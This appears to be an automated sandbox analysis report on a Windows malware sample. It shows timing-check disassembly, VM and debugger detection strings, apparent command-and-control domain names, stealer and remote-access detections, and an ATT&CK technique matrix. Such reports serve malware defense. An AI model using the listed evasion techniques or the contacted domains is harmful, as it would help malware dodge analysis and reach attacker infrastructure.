    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4946D second address: B49471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49471 second address: B4949D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100BF03ECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5100BF03F8h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46CE5 second address: B46D05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F5100C93C15h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46D05 second address: B46D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5100BF03E6h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46D10 second address: B46D3A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 jmp 00007F5100C93C19h 0x0000000e ja 00007F5100C93C06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46D3A second address: B46D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5617E second address: B56190 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5100C93C0Ch 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56190 second address: B56196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56196 second address: B561A0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5100C93C06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55D3A second address: B55D5C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5100BF03E8h 0x00000008 push esi 0x00000009 jmp 00007F5100BF03F5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55E84 second address: B55E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E61D second address: B6E626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E626 second address: B6E62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E99B second address: B6E9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E9A6 second address: B6E9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E9AC second address: B6E9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6E9B0 second address: B6E9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6EC3A second address: B6EC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5100BF03E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F5100BF03EFh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F22E second address: B6F232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F232 second address: B6F23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F23D second address: B6F24D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F5100C93C06h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F24D second address: B6F251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F251 second address: B6F257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F257 second address: B6F268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03ECh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F516 second address: B6F51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F51A second address: B6F520 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F520 second address: B6F539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jg 00007F5100C93C08h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 je 00007F5100C93C06h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B720E6 second address: B720F0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5100BF03ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7217C second address: B7219D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7232A second address: B7232E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7232E second address: B72334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7390E second address: B73914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73914 second address: B73918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73918 second address: B7397F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnl 00007F5100BF03E6h 0x0000000d pop ecx 0x0000000e jne 00007F5100BF03F2h 0x00000014 jp 00007F5100BF03F7h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5100BF03F3h 0x00000022 js 00007F5100BF03FAh 0x00000028 jmp 00007F5100BF03F4h 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7705B second address: B77082 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5100C93C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5100C93C15h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F5100C93C06h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77082 second address: B77086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA0C6C second address: 4BA0CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F5100C93C14h 0x00000016 jmp 00007F5100C93C15h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov dx, ax 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA0CB2 second address: 4BA0CD2 instructions: 0x00000000 rdtsc 0x00000002 call 00007F5100BF03EAh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test ecx, ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5100BF03ECh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA0CD2 second address: 4BA0D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F5100C93C45h 0x0000000f jmp 00007F5100C93C16h 0x00000014 add eax, ecx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5100C93C0Eh 0x0000001d sub si, 0818h 0x00000022 jmp 00007F5100C93C0Bh 0x00000027 popfd 0x00000028 mov eax, 2D90B3CFh 0x0000002d popad 0x0000002e mov eax, dword ptr [eax+00000860h] 0x00000034 pushad 0x00000035 mov ax, 4DC7h 0x00000039 mov eax, 4E52FF63h 0x0000003e popad 0x0000003f test eax, eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F5100C93C15h 0x00000048 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E371 second address: A8E37C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F5100BF03E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E37C second address: A8E39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F5100C93C0Fh 0x0000000e jnp 00007F5100C93C0Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E529 second address: A8E52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E52D second address: A8E533 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E533 second address: A8E55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5100BF03E6h 0x00000009 jmp 00007F5100BF03F7h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0010 second address: 4BC0014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0014 second address: 4BC001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC001A second address: 4BC00A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5100C93C0Ch 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F5100C93C0Bh 0x0000000f jmp 00007F5100C93C13h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a call 00007F5100C93C14h 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007F5100C93C17h 0x00000026 adc eax, 2484A12Eh 0x0000002c jmp 00007F5100C93C19h 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC00A4 second address: 4BC00BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC00BE second address: 4BC0130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5100C93C16h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007F5100C93C0Dh 0x00000017 pushfd 0x00000018 jmp 00007F5100C93C10h 0x0000001d sbb cx, 6E98h 0x00000022 jmp 00007F5100C93C0Bh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a mov edx, dword ptr [ebp+0Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F5100C93C11h 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0130 second address: 4BC0134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0134 second address: 4BC013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC013A second address: 4BC0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5100BF03F3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0151 second address: 4BC0162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0162 second address: 4BC0166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC0166 second address: 4BC016C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BC01C0 second address: 4BC01C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8E3DDB instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A84503 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A82BCA instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B11955 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 5632Thread sleep time: -90000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, file.exe, 00000001.00000002.1593886455.0000000000A63000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.12.drBinary or memory string: VMware
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;
    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000001.00000002.1594572320.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.12.drBinary or memory string: vmci.sys
    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.12.drBinary or memory string: VMware20,1
    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000001.00000002.1593886455.0000000000A63000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
    Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exe, file.exe, 00000001.00000002.1593886455.0000000000A63000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 80Program Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    2
    Process Injection
    24
    Virtualization/Sandbox Evasion
    OS Credential Dumping641
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    2
    Process Injection
    LSASS Memory24
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell
    Logon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account Manager2
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information
    NTDS223
    System Information Discovery
    Distributed Component Object ModelInput Capture114
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
